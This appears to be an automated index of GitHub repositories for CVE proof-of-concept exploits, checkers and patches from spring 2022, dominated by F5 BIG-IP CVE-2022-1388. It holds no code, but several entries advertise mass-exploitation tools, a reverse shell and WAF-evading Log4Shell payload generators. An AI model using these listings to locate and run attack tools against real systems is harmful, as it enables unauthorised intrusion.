**A Test API for testing the POC against CVE-2022-1388** : [bandit92/CVE2022-1388_TestAPI](https://github.com/bandit92/CVE2022-1388_TestAPI) create time: 2022-05-10T15:34:14Z

**Test and Exploit Scripts for CVE 2022-1388 (F5 Big-IP)** : [thatonesecguy/CVE-2022-1388-Exploit](https://github.com/thatonesecguy/CVE-2022-1388-Exploit) create time: 2022-05-10T15:16:12Z

**[Reserved For CVE-2022-29554]** : [ComparedArray/printix-CVE-2022-29554](https://github.com/ComparedArray/printix-CVE-2022-29554) create time: 2022-05-10T14:37:19Z

**[Reserved for CVE-2022-29553]** : [ComparedArray/printix-CVE-2022-29553](https://github.com/ComparedArray/printix-CVE-2022-29553) create time: 2022-05-10T14:36:36Z

**[Reserved for CVE-2022-29552]** : [ComparedArray/printix-CVE-2022-29552](https://github.com/ComparedArray/printix-CVE-2022-29552) create time: 2022-05-10T14:35:57Z

**[Reserved For CVE-2022-29551]** : [ComparedArray/printix-CVE-2022-29551](https://github.com/ComparedArray/printix-CVE-2022-29551) create time: 2022-05-10T14:35:15Z

**CVE-2022-24086 and CVE-2022-24087 are an rce in adobe commerce and magento** : [TomArni680/CVE-2022-24086-rce](https://github.com/TomArni680/CVE-2022-24086-rce) create time: 2022-05-10T14:32:06Z

**CVE-2007-2447** : [Nosferatuvjr/Samba-Usermap-exploit](https://github.com/Nosferatuvjr/Samba-Usermap-exploit) create time: 2022-05-10T09:37:07Z

**no description** : [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23852](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23852) create time: 2022-05-10T09:22:18Z

**no description** : [vesperp/CVE-2022-1388-F5-BIG-IP-](https://github.com/vesperp/CVE-2022-1388-F5-BIG-IP-) create time: 2022-05-10T09:12:22Z

**BIG-IP iControl REST vulnerability CVE-2022-1388 PoC** : [shamo0/CVE-2022-1388](https://github.com/shamo0/CVE-2022-1388) create time: 2022-05-10T08:44:24Z

**Simple shell script for the exploit** : [iveresk/cve-2022-1388-1veresk](https://github.com/iveresk/cve-2022-1388-1veresk) create time: 2022-05-10T08:22:46Z

**CVE-2022-1388-EXP可批量实现攻击** : [LinJacck/CVE-2022-1388-EXP](https://github.com/LinJacck/CVE-2022-1388-EXP) create time: 2022-05-10T08:09:30Z

**no description** : [hou5/CVE-2022-1388](https://github.com/hou5/CVE-2022-1388) create time: 2022-05-10T07:24:33Z

**no description** : [Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388](https://github.com/Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388) create time: 2022-05-10T05:30:11Z

**POC of CVE-2022-1388** : [chesterblue/CVE-2022-1388](https://github.com/chesterblue/CVE-2022-1388) create time: 2022-05-10T04:51:06Z

**Reverse Shell for CVE-2022-1388** : [qusaialhaddad/F5-BigIP-CVE-2022-1388](https://github.com/qusaialhaddad/F5-BigIP-CVE-2022-1388) create time: 2022-05-10T04:44:05Z

**may the poc with you!** : [killvxk/CVE-2022-1388](https://github.com/killvxk/CVE-2022-1388) create time: 2022-05-10T04:13:47Z

**CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.** : [MrCl0wnLab/Nuclei-Template-Exploit-CVE-2022-1388-BIG-IP-iControl-REST](https://github.com/MrCl0wnLab/Nuclei-Template-Exploit-CVE-2022-1388-BIG-IP-iControl-REST) create time: 2022-05-10T04:10:46Z

**PoC For F5 BIG-IP - bash script Exploit one Liner** : [Stonzyy/Exploit-F5-CVE-2022-1388](https://github.com/Stonzyy/Exploit-F5-CVE-2022-1388) create time: 2022-05-10T02:57:31Z

**no description** : [lowkey0808/cve-2020-25540](https://github.com/lowkey0808/cve-2020-25540) create time: 2022-05-10T02:33:46Z

**no description** : [trhacknon/CVE-2022-1388-RCE-checker](https://github.com/trhacknon/CVE-2022-1388-RCE-checker) create time: 2022-05-09T17:34:28Z

**A Insecure direct object references (IDOR) vulnerability in "Simple 2FA Plugin for Moodle" by LMS Doctor** : [FlaviuPopescu/CVE-2022-28986](https://github.com/FlaviuPopescu/CVE-2022-28986) create time: 2022-05-09T17:07:37Z

**A Two-Factor Authentication (2FA) bypass vulnerability in "Simple 2FA Plugin for Moodle" by LMS Doctor** : [FlaviuPopescu/CVE-2022-28601](https://github.com/FlaviuPopescu/CVE-2022-28601) create time: 2022-05-09T16:57:14Z

**CVE-2022-1040 is an authentication bypass and rce in user portal and webadmin of sophos firewall** : [Seatwe/CVE-2022-1040-rce](https://github.com/Seatwe/CVE-2022-1040-rce) create time: 2022-05-09T16:49:58Z

**CVE-2022-26809 is a vulnerability in Remote Procedure Call Runtime** : [ExploitPwner/CVE-2022-26809-RCE-POC](https://github.com/ExploitPwner/CVE-2022-26809-RCE-POC) create time: 2022-05-09T16:48:30Z

**CVE-2022-1388 POC exploit** : [superzerosec/CVE-2022-1388](https://github.com/superzerosec/CVE-2022-1388) create time: 2022-05-09T15:42:55Z

**Generate primary obfuscated or secondary obfuscated CVE-2021-44228 or CVE-2021-45046 payloads to evade WAF detection.** : [r3kind1e/Log4Shell-obfuscated-payloads-generator](https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator) create time: 2022-05-09T15:02:29Z

**CVE-2022-1388** : [saucer-man/CVE-2022-1388](https://github.com/saucer-man/CVE-2022-1388) create time: 2022-05-09T15:24:27Z

**CVE-2022-1388 F5 BIG-IP iControl REST身份验证绕过漏洞** : [savior-only/CVE-2022-1388](https://github.com/savior-only/CVE-2022-1388) create time: 2022-05-09T14:37:04Z

**no description** : [jcarabantes/CVE-2022-28590](https://github.com/jcarabantes/CVE-2022-28590) create time: 2022-05-09T14:12:58Z

**no description** : [cve-hunter/CVE-2022-1388-mass](https://github.com/cve-hunter/CVE-2022-1388-mass) create time: 2022-05-09T14:09:49Z

**多线程验证** : [Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388-](https://github.com/Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388-) create time: 2022-05-09T14:09:34Z

**F5 BIG-IP iControl REST身份验证绕过漏洞** : [Henry4E36/CVE-2022-1388](https://github.com/Henry4E36/CVE-2022-1388) create time: 2022-05-09T14:02:34Z

**CVE-2022-1388 F5 BIG-IP iControl REST RCE** : [Al1ex/CVE-2022-1388](https://github.com/Al1ex/CVE-2022-1388) create time: 2022-05-09T14:01:38Z

**no description** : [HoAd-sc/CVE_2022_1388](https://github.com/HoAd-sc/CVE_2022_1388) create time: 2022-05-09T13:41:11Z

**no description** : [Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492](https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2022-0492) create time: 2022-05-09T13:20:03Z

**Apisix系列漏洞:未授权漏洞(CVE-2021-45232)、默认秘钥(CVE-2020-13945)批量探测。** : [YutuSec/Apisix_Crack](https://github.com/YutuSec/Apisix_Crack) create time: 2022-05-09T12:26:11Z

**Atlassian Bitbucket Data Center反序列化漏洞(CVE-2022-26133)批量验证和利用脚本** : [Pear1y/CVE-2022-26133](https://github.com/Pear1y/CVE-2022-26133) create time: 2022-05-09T12:07:51Z

**Poc Exploit for BIG-IP Pre-Auth RCE - CVE-2022-1388** : [crowsec-edtech/CVE-2022-1388](https://github.com/crowsec-edtech/CVE-2022-1388) create time: 2022-05-09T11:58:37Z

**POC for CVE-2022-1388** : [horizon3ai/CVE-2022-1388](https://github.com/horizon3ai/CVE-2022-1388) create time: 2022-05-09T11:46:45Z

**Exploit and Check Script for CVE 2022-1388** : [ZephrFish/F5-CVE-2022-1388-Exploit](https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit) create time: 2022-05-09T11:30:09Z

**CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE** : [0xf4n9x/CVE-2022-1388](https://github.com/0xf4n9x/CVE-2022-1388) create time: 2022-05-09T10:22:31Z

**CVE-2022-1388 F5 Big IP unauth remote code execution** : [Vulnmachines/F5-Big-IP-CVE-2022-1388](https://github.com/Vulnmachines/F5-Big-IP-CVE-2022-1388) create time: 2022-05-09T10:46:19Z

**F5 BIG-IP RCE exploitation (CVE-2022-1388)** : [alt3kx/CVE-2022-1388_PoC](https://github.com/alt3kx/CVE-2022-1388_PoC) create time: 2022-05-09T10:34:38Z

**batch scan CVE-2022-1388** : [yukar1z0e/CVE-2022-1388](https://github.com/yukar1z0e/CVE-2022-1388) create time: 2022-05-09T10:06:11Z

**PoC for CVE-2022-1388_F5_BIG-IP** : [sherlocksecurity/CVE-2022-1388_F5_BIG-IP](https://github.com/sherlocksecurity/CVE-2022-1388_F5_BIG-IP) create time: 2022-05-09T07:39:55Z

**no description** : [Hudi233/CVE-2022-1388](https://github.com/Hudi233/CVE-2022-1388) create time: 2022-05-09T03:20:46Z

**Files required to demonstrate CVE-2022-0847 vulnerability in Linux Kernel v5.8** : [isaiahsimeone/COMP3320-VAPT](https://github.com/isaiahsimeone/COMP3320-VAPT) create time: 2022-05-08T20:17:08Z

**no description** : [Altelus1/CVE-2022-24734](https://github.com/Altelus1/CVE-2022-24734) create time: 2022-05-08T15:20:41Z

**CVE-2022-26809 | is a remote code execution vulnerablity in rpc runtime and affects a wide versions of windows** : [seciurdt/CVE-2022-26809-POC](https://github.com/seciurdt/CVE-2022-26809-POC) create time: 2022-05-08T15:00:29Z

**no description** : [blind-intruder/CVE-2022-1388-RCE-checker](https://github.com/blind-intruder/CVE-2022-1388-RCE-checker) create time: 2022-05-08T09:28:19Z

**UNIT4 TETA Mobile Edition 29HF13 was discovered to contain a SQL injection vulnerability via the ProfileName parameter in the errorReporting page.** : [LongWayHomie/CVE-2022-27434](https://github.com/LongWayHomie/CVE-2022-27434) create time: 2022-05-07T21:57:15Z

**no description** : [jr64/CVE-2015-0311](https://github.com/jr64/CVE-2015-0311) create time: 2022-05-07T21:08:23Z

**BIG-IP iCONTROL REST AUTH BYPASS RCE POC CVE-2022-1388** : [TomArni680/CVE-2022-1388-RCE](https://github.com/TomArni680/CVE-2022-1388-RCE) create time: 2022-05-07T18:02:55Z

**CVE-2022-1388 F5 BIG-IP iControl Rest API exposed RCE Check** : [bytecaps/F5-BIG-IP-RCE-Check](https://github.com/bytecaps/F5-BIG-IP-RCE-Check) create time: 2022-05-07T17:54:08Z

**A vulnerability scanner that detects CVE-2021-21980 vulnerabilities.** : [Osyanina/westone-CVE-2022-1388-scanner](https://github.com/Osyanina/westone-CVE-2022-1388-scanner) create time: 2022-05-07T12:36:41Z

**SambaCry exploit (CVE-2017-7494)** : [eulercode/exploit-CVE-2017-7494](https://github.com/eulercode/exploit-CVE-2017-7494) create time: 2022-05-07T11:42:40Z

**CVE-2022-25075 totolink command injection vulnerability** : [kuznyJan1972/CVE-2022-25075-RCE](https://github.com/kuznyJan1972/CVE-2022-25075-RCE) create time: 2022-05-07T11:43:01Z

**Just proof of concept for Cisco CVE-2020-3452. Using external or internal file base.** : [iveresk/cve-2020-3452](https://github.com/iveresk/cve-2020-3452) create time: 2022-05-07T09:45:25Z

**FFMPEG heap overflow exploit CVE-2016-10190** : [muzalam/FFMPEG-exploit](https://github.com/muzalam/FFMPEG-exploit) create time: 2022-05-07T06:51:05Z

**I don't own this, but this is from Nmap** : [WTSTiNy/CVE-2014-3704](https://github.com/WTSTiNy/CVE-2014-3704) create time: 2022-05-07T03:00:27Z

**CVE-2021-43287_GoCD_fileread_POC_EXP** : [Wrin9/CVE-2021-43287](https://github.com/Wrin9/CVE-2021-43287) create time: 2022-05-07T02:54:59Z

**no description** : [LinJacck/CVE-2022-29464](https://github.com/LinJacck/CVE-2022-29464) create time: 2022-05-07T03:00:08Z

**fuzzing with libFuzzer,inlude openssl heartbleed (CVE-2014-0160)** : [GardeniaWhite/fuzzing](https://github.com/GardeniaWhite/fuzzing) create time: 2022-05-07T00:52:46Z

**WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation** : [biulove0x/CVE-2022-0441](https://github.com/biulove0x/CVE-2022-0441) create time: 2022-05-06T17:40:55Z

**no description** : [u201424348/CVE-2022-21984](https://github.com/u201424348/CVE-2022-21984) create time: 2022-05-06T17:08:43Z

**may the poc with you** : [killvxk/CVE-2022-1040](https://github.com/killvxk/CVE-2022-1040) create time: 2022-05-06T08:56:04Z

**This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.** : [MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed](https://github.com/MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed) create time: 2022-05-06T06:22:47Z

**no description** : [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25236](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-25236) create time: 2022-05-06T05:19:11Z

**Simple script realizado en bash, para revisión de múltiples hosts para CVE-2022-1388 (F5)** : [jheeree/CVE-2022-1388-checker](https://github.com/jheeree/CVE-2022-1388-checker) create time: 2022-05-05T15:25:53Z

**BIG** : [TomArni680/CVE-2022-1388-POC](https://github.com/TomArni680/CVE-2022-1388-POC) create time: 2022-05-05T14:55:45Z

**no description** : [0xRaw/CVE-2021-42183](https://github.com/0xRaw/CVE-2021-42183) create time: 2022-05-05T13:45:43Z

**K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388** : [numanturle/CVE-2022-1388](https://github.com/numanturle/CVE-2022-1388) create time: 2022-05-05T10:35:35Z

**no description** : [Nivaskumark/packages_apps_settings_A10_r33_CVE-2020-0188](https://github.com/Nivaskumark/packages_apps_settings_A10_r33_CVE-2020-0188) create time: 2022-05-05T09:23:04Z

**no description** : [cve-hunter/CVE-2022-1040-sophos-rce](https://github.com/cve-hunter/CVE-2022-1040-sophos-rce) create time: 2022-05-05T10:15:38Z

**CVE-2022-22954 analyst** : [nguyenv1nK/CVE-2022-22954](https://github.com/nguyenv1nK/CVE-2022-22954) create time: 2022-05-05T10:06:44Z

**no description** : [KrungSalad/POC-CVE-2022-1444](https://github.com/KrungSalad/POC-CVE-2022-1444) create time: 2022-05-05T09:03:29Z

**CVE-2020-0890 | Windows Hyper-V Denial of Service Vulnerability proof-of-concept code** : [MarcelloTinocor/gerhart01](https://github.com/MarcelloTinocor/gerhart01) create time: 2022-05-05T07:56:13Z

**no description** : [crypt0r00t/CVE-2022-26809](https://github.com/crypt0r00t/CVE-2022-26809) create time: 2022-05-05T06:51:05Z

**1** : [axin2019/CVE-2022-29464](https://github.com/axin2019/CVE-2022-29464) create time: 2022-05-05T06:02:52Z

**Improper privilege management vulnerability in Samsung Video Player prior to version 7.3.15.30 allows attackers to execute video files without permission.** : [heegong/CVE-2022-24924](https://github.com/heegong/CVE-2022-24924) create time: 2022-05-05T03:08:53Z

**CMS Made Simple < 2.2.10 - SQL Injection (rewritten for python3), CVE-2019-905** : [xtafnull/CMS-made-simple-sqli-python3](https://github.com/xtafnull/CMS-made-simple-sqli-python3) create time: 2022-05-04T09:26:45Z

**PoC + vulnerability details for CVE-2022-25262 / JetBrains Hub single-click SAML response takeover** : [yuriisanin/CVE-2022-25262](https://github.com/yuriisanin/CVE-2022-25262) create time: 2022-05-03T21:38:58Z

**Cachet configuration leak dumper. CVE-2021-39174 PoC.** : [narkopolo/CVE-2021-39174-PoC](https://github.com/narkopolo/CVE-2021-39174-PoC) create time: 2022-05-03T20:17:23Z

**My own python implementation of a CVE-2021-22204 exploit** : [BBurgarella/CVE-2021-22204](https://github.com/BBurgarella/CVE-2021-22204) create time: 2022-05-03T16:36:02Z

**no description** : [rhysmcneill/CVE-2021-403](https://github.com/rhysmcneill/CVE-2021-403) create time: 2022-05-03T09:36:40Z

**no description** : [Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0215](https://github.com/Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0215) create time: 2022-05-03T05:47:48Z

**CVE-2018-17553 PoC** : [MidwintersTomb/CVE-2018-17553](https://github.com/MidwintersTomb/CVE-2018-17553) create time: 2022-05-03T02:43:59Z

**PoC of CVE-2022-24707** : [Altelus1/CVE-2022-24707](https://github.com/Altelus1/CVE-2022-24707) create time: 2022-05-03T01:11:56Z

**DISCLAIMER: This is a re-upload of my very first spring project from 2019. It contains old dependencies with known CVEs, a lot of bad practices and many poor design decisions. It should not be taken as any kind of reference. It is only here to remind me where I started :)** : [mockxe/cardatabase](https://github.com/mockxe/cardatabase) create time: 2022-04-25T16:22:14Z

**no description** : [Willian-2-0-0-1/Log4j-Exploit-CVE-2021-44228](https://github.com/Willian-2-0-0-1/Log4j-Exploit-CVE-2021-44228) create time: 2022-05-02T16:53:26Z

**no description** : [Off3nS3c/CVE-2022-29932](https://github.com/Off3nS3c/CVE-2022-29932) create time: 2022-05-02T13:56:05Z

**TOTOLINK A800R/A810R/A830R/A950RG/A3000RU/A3100R setUpgradeFW FileName command injection** : [ExploitPwner/Totolink-CVE-2022-Exploits](https://github.com/ExploitPwner/Totolink-CVE-2022-Exploits) create time: 2022-05-02T06:47:00Z

**CVE-2022-22954, CVE-2022-22955,CVE-2022-22956, CVE-2022-22957, CVE-2022-22958, CVE-2022-22959, CVE-2022-22960, CVE-2022-22961 all in one!** : [kaanymz/2022-04-06-critical-vmware-fix](https://github.com/kaanymz/2022-04-06-critical-vmware-fix) create time: 2022-05-01T20:52:10Z

**no description** : [yuanLink/CVE-2022-26809](https://github.com/yuanLink/CVE-2022-26809) create time: 2022-05-01T13:19:10Z

**Resolving the CVE-2022-22948 vulnerability** : [kaanymz/vcenter-cve-fix](https://github.com/kaanymz/vcenter-cve-fix) create time: 2022-05-01T11:28:07Z

**TEM FLEX-1080/FLEX-1085 1.6.0 log log.cgi Information Disclosure** : [MrEmpy/CVE-2022-1077](https://github.com/MrEmpy/CVE-2022-1077) create time: 2022-04-30T21:55:03Z

**This repository contains a PoC for remote code execution CVE-2022-26809** : [ZyxelTeam/CVE-2022-26809-RCE](https://github.com/ZyxelTeam/CVE-2022-26809-RCE) create time: 2022-04-30T15:49:28Z

**no description** : [kuangting4231/mitigation-cve-2019-9787](https://github.com/kuangting4231/mitigation-cve-2019-9787) create time: 2022-04-30T12:19:50Z

**no description** : [Trinadh465/external_sonivox_AOSP10_r33_CVE-2020-0381](https://github.com/Trinadh465/external_sonivox_AOSP10_r33_CVE-2020-0381) create time: 2022-04-30T06:37:25Z

**no description** : [Trinadh465/packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418](https://github.com/Trinadh465/packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418) create time: 2022-04-30T06:16:17Z

**no description** : [Trinadh465/platform_art_AOSP10_r33_CVE-2021-0511](https://github.com/Trinadh465/platform_art_AOSP10_r33_CVE-2021-0511) create time: 2022-04-30T05:54:11Z

**no description** : [UUFR/CVE-2022-29464](https://github.com/UUFR/CVE-2022-29464) create time: 2022-04-30T04:30:51Z

**no description** : [UUFR/CVE-2022-29464](https://github.com/UUFR/CVE-2022-29464) create time: 2022-04-30T04:21:26Z

**no description** : [Trinadh465/external_curl_AOSP10_r33_CVE-2021-22924](https://github.com/Trinadh465/external_curl_AOSP10_r33_CVE-2021-22924) create time: 2022-04-30T03:40:15Z

**CVE-2021-44228 Log4j Summary** : [TPower2112/Writing-Sample-1](https://github.com/TPower2112/Writing-Sample-1) create time: 2022-04-30T02:35:38Z

**CVE-2022-28508** : [YavuzSahbaz/CVE-2022-28508](https://github.com/YavuzSahbaz/CVE-2022-28508) create time: 2022-04-28T01:10:17Z

**SQL injection for Poultry Farm Management System 1.0** : [IbrahimEkimIsik/CVE-2022-28099](https://github.com/IbrahimEkimIsik/CVE-2022-28099) create time: 2022-04-30T02:01:09Z

**This is an edited version of the CVE-2018-19422 exploit to fix an small but annoying issue I had.** : [Swammers8/SubrionCMS-4.2.1-File-upload-RCE-auth-](https://github.com/Swammers8/SubrionCMS-4.2.1-File-upload-RCE-auth-) create time: 2022-04-29T17:23:23Z

**no description** : [Trinadh465/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963](https://github.com/Trinadh465/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963) create time: 2022-04-29T12:36:35Z

**no description** : [ShaikUsaf/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326](https://github.com/ShaikUsaf/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326) create time: 2022-04-29T11:05:51Z

**no description** : [ShaikUsaf/external_v8_AOSP10_r33_CVE-2020-0240](https://github.com/ShaikUsaf/external_v8_AOSP10_r33_CVE-2020-0240) create time: 2022-04-29T10:25:19Z

**no description** : [Trinadh465/external_boringssl_openssl_1.1.0g_CVE-2021-23841](https://github.com/Trinadh465/external_boringssl_openssl_1.1.0g_CVE-2021-23841) create time: 2022-04-29T10:16:14Z

**no description** : [Enokiy/spring-RCE-CVE-2022-22965](https://github.com/Enokiy/spring-RCE-CVE-2022-22965) create time: 2022-04-29T09:58:05Z

**CVE-2022-29464 POC exploit** : [superzerosec/CVE-2022-29464](https://github.com/superzerosec/CVE-2022-29464) create time: 2022-04-29T08:24:17Z

**no description** : [Trinadh465/hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155](https://github.com/Trinadh465/hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155) create time: 2022-04-29T06:33:54Z

**no description** : [Trinadh465/external_v8_AOSP10_r33_CVE-2021-0393](https://github.com/Trinadh465/external_v8_AOSP10_r33_CVE-2021-0393) create time: 2022-04-29T07:09:27Z

**no description** : [Satheesh575555/frameworks_minikin_AOSP10_r33_CVE-2021-0313](https://github.com/Satheesh575555/frameworks_minikin_AOSP10_r33_CVE-2021-0313) create time: 2022-04-29T06:30:27Z

**no description** : [Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0198](https://github.com/Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0198) create time: 2022-04-29T06:08:29Z

**no description** : [Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0181](https://github.com/Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0181) create time: 2022-04-29T05:24:12Z

**no description** : [Satheesh575555/external_v8_AOSP10_r33_CVE-2021-0396](https://github.com/Satheesh575555/external_v8_AOSP10_r33_CVE-2021-0396) create time: 2022-04-29T05:28:48Z

**no description** : [Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516](https://github.com/Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516) create time: 2022-04-29T04:30:40Z

**no description** : [iczc/Ethermint-CVE-2021-25837](https://github.com/iczc/Ethermint-CVE-2021-25837) create time: 2022-04-29T03:12:27Z

**CVE-2022-28452** : [YavuzSahbaz/Red-Planet-Laundry-Management-System-1.0-is-vulnerable-to-SQL](https://github.com/YavuzSahbaz/Red-Planet-Laundry-Management-System-1.0-is-vulnerable-to-SQL) create time: 2022-04-29T03:03:25Z

**Loops through all Log4j files and remediates CVE-2021-44228** : [digital-dev/Log4j-CVE-2021-44228-Remediation](https://github.com/digital-dev/Log4j-CVE-2021-44228-Remediation) create time: 2022-04-28T23:56:01Z

**no description** : [mwina/CVE-2022-21728-test](https://github.com/mwina/CVE-2022-21728-test) create time: 2022-04-28T23:56:58Z

**CVE-2021-30937 vulnerability checking app** : [realrodri/ExploiteameEsta](https://github.com/realrodri/ExploiteameEsta) create time: 2022-04-28T14:50:00Z

**no description** : [Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0453](https://github.com/Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0453) create time: 2022-04-28T13:12:23Z

**Astra Pro Addon < 3.5.2 - Unauthenticated SQL Injection - CVE-2021-24507** : [RandomRobbieBF/CVE-2021-24507](https://github.com/RandomRobbieBF/CVE-2021-24507) create time: 2022-04-28T13:10:55Z

**Solar Appscreener XXE** : [jet-pentest/CVE-2022-24449](https://github.com/jet-pentest/CVE-2022-24449) create time: 2022-04-28T12:51:01Z

**no description** : [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-39706](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2021-39706) create time: 2022-04-28T11:30:43Z

**no description** : [ShaikUsaf/external_libexif_AOSP10_CVE-2020-0452](https://github.com/ShaikUsaf/external_libexif_AOSP10_CVE-2020-0452) create time: 2022-04-28T10:23:41Z

**no description** : [Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2021-33034](https://github.com/Trinadh465/device_renesas_kernel_AOSP10_r33_CVE-2021-33034) create time: 2022-04-28T10:04:41Z

**no description** : [ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329](https://github.com/ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329) create time: 2022-04-28T08:41:00Z

**no description** : [ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328](https://github.com/ShaikUsaf/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328) create time: 2022-04-28T08:28:31Z

**no description** : [Satheesh575555/linux-4.19.72_CVE-2021-45485](https://github.com/Satheesh575555/linux-4.19.72_CVE-2021-45485) create time: 2022-04-28T07:38:04Z

**no description** : [Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23990](https://github.com/Satheesh575555/external_expat_AOSP10_r33_CVE-2022-23990) create time: 2022-04-28T05:39:11Z

**for kernel 3.18.x** : [enceka/cve-2019-2215-3.18](https://github.com/enceka/cve-2019-2215-3.18) create time: 2022-04-28T03:47:00Z

**no description** : [RedLeavesChilde/CVE-2021-40444](https://github.com/RedLeavesChilde/CVE-2021-40444) create time: 2022-04-28T02:14:10Z

**CVE-2022-28454** : [YavuzSahbaz/Limbas-4.3.36.1319-is-vulnerable-to-Cross-Site-Scripting-XSS-](https://github.com/YavuzSahbaz/Limbas-4.3.36.1319-is-vulnerable-to-Cross-Site-Scripting-XSS-) create time: 2022-04-28T01:12:19Z

**no description** : [QwertyStack/CVE-2021-40444_PoC](https://github.com/QwertyStack/CVE-2021-40444_PoC) create time: 2022-04-27T20:38:22Z

**CVE-2021-41773&CVE-2021-42013** : [wangfly-me/Apache_Penetration_Tool](https://github.com/wangfly-me/Apache_Penetration_Tool) create time: 2022-04-27T15:17:38Z

**no description** : [Nivaskumark/A10_system_bt_CVE-2021-0589](https://github.com/Nivaskumark/A10_system_bt_CVE-2021-0589) create time: 2022-04-27T12:08:18Z

**no description** : [Nivaskumark/expat_A10_r33_2_2_6_CVE-2022-23990](https://github.com/Nivaskumark/expat_A10_r33_2_2_6_CVE-2022-23990) create time: 2022-04-27T11:46:00Z

**OS X 10.11.6 LPE PoC for CVE-2016-4655 / CVE-2016-4656** : [liangle1986126z/jndok](https://github.com/liangle1986126z/jndok) create time: 2022-04-27T09:11:28Z

**no description** : [khidottrivi/CVE-2022-22965](https://github.com/khidottrivi/CVE-2022-22965) create time: 2022-04-27T07:57:50Z

**no description** : [pazhanivel07/Settings_10-r33_CVE-2020-0394_02](https://github.com/pazhanivel07/Settings_10-r33_CVE-2020-0394_02) create time: 2022-04-27T04:59:22Z

**no description** : [pazhanivel07/Settings_10-r33_CVE-2020-0394](https://github.com/pazhanivel07/Settings_10-r33_CVE-2020-0394) create time: 2022-04-27T04:42:49Z

**no description** : [nanopathi/frameworks_base1_CVE-2021-0315](https://github.com/nanopathi/frameworks_base1_CVE-2021-0315) create time: 2022-04-27T05:01:30Z

**no description** : [nanopathi/packages_apps_Settings_CVE-2021-0394](https://github.com/nanopathi/packages_apps_Settings_CVE-2021-0394) create time: 2022-04-27T04:40:51Z

**Image Magick Exploit for CVE-2016–3714** : [MrrRaph/pandagik](https://github.com/MrrRaph/pandagik) create time: 2022-04-26T17:12:36Z

**no description** : [nanopathi/Packages_wpa_supplicant8_CVE-2021-0326](https://github.com/nanopathi/Packages_wpa_supplicant8_CVE-2021-0326) create time: 2022-04-26T14:41:51Z

**no description** : [Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326](https://github.com/Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326) create time: 2022-04-26T14:33:04Z

**CVE-2021-4034 PoC** : [0x4ndy/CVE-2021-4034-PoC](https://github.com/0x4ndy/CVE-2021-4034-PoC) create time: 2022-04-20T19:44:03Z

**Django QuerySet.annotate(), aggregate(), extra() SQL 注入** : [DeEpinGh0st/CVE-2022-28346](https://github.com/DeEpinGh0st/CVE-2022-28346) create time: 2022-04-26T14:47:56Z

**no description** : [nanopathi/wpa_supplicant_8_CVE-2021-0326.](https://github.com/nanopathi/wpa_supplicant_8_CVE-2021-0326.) create time: 2022-04-26T14:19:31Z

**no description** : [nanopathi/packages_apps_ManagedProvisioning_CVE-2021-39692](https://github.com/nanopathi/packages_apps_ManagedProvisioning_CVE-2021-39692) create time: 2022-04-26T13:03:35Z

**no description** : [pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0315](https://github.com/pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0315) create time: 2022-04-26T12:46:33Z

**no description** : [nanopathi/linux-4.19.72_CVE-2021-3347](https://github.com/nanopathi/linux-4.19.72_CVE-2021-3347) create time: 2022-04-26T11:32:34Z

**dingdingtest** : [w1023913214/CVE-2022-8899](https://github.com/w1023913214/CVE-2022-8899) create time: 2022-04-26T11:26:18Z

